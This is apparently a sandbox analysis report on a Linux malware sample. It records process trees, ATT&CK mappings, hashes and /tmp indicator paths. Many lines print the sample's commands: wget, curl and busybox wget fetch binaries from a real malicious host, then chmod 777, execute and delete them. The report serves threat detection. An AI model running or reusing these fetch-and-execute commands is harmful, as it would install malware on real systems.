- /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  ./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:967
- /bin/chmod
  chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  ./DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:970
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - System Network Configuration Discovery
  PID:971
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:974
- /bin/chmod
  chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  ./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Executes dropped EXE
  PID:976
- /bin/rm
  rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:977
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:978
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:981
- /bin/chmod
  chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  ./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:984
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:985
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:988
- /bin/chmod
  chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  ./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  PID:991
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:992
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:993
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:995
- /bin/chmod
  chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  ./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  PID:998
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  PID:999
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1000
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:1002
- /bin/chmod
  chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - File and Directory Permissions Modification
  PID:1003
- /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  ./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Executes dropped EXE
  PID:1004
- /bin/rm
  rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  PID:1005

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	737	WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	744	FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	766	JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	802	BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	810	tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	820	idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	842	mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	864	4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	871	DQul2qKd09ITKkHJpETty8DirCA07F1nBT
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	878	teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	885	PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	892	ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	899	2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	906	zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	913	mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	920	WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	927	FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	934	JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	941	BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	948	tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	955	idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	962	4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	969	DQul2qKd09ITKkHJpETty8DirCA07F1nBT
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	976	zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	983	teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	990	PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	997	ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	1004	2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS